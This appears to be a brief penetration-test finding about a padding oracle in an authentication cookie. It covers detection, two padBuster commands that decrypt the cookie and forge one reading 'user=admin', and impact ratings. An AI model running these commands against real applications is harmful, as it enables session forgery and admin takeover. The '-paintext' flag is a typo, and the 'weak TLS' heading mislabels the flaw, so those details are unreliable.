V6 - Cryptography
Weak TLS configuration - Padding Oracle
POC
Detection: If you create an account and log in two times with this account, you can see that the cookie sent by the application didn't change. There is probably a Padding Oracle vuln. here
Exploitation: Use: padBuster.pl URL EncryptedSample BlockSize [options]
/usr/bin/perl padBuster.pl URL u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV 8 -cookies auth=u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV
/usr/bin/perl padBuster.pl URL u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV 8 -cookies auth=u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV -paintext user=admin
Impact
Low-Medium (depends on the information disclosure)
Likelihood
Low-Medium